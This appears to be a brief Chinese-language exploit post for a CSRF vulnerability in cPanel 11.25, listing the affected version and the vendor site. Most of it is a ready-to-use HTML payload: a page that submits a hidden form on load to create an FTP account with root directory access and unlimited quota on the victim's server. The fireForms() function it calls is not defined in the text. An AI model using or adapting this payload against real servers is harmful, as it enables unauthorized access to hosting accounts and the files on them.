Cpanel v11.25 CSRF 添加管理员账号漏洞。
Exploite:
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="http://server:2082/frontend/x3/ftp/doaddftp.html">
<input type="hidden" name="login" value="name"/>
<input type="hidden" name="password" value="pass"/>
<input type="hidden" name="password2" value="pass"/>
<input type="hidden" name="homedir" value="/"/>
<input type="hidden" name="quota" value="unlimited"/>
</form>
</body>
</html>
影响版本:V 11.25
官方地址:http://www.cpanel.net/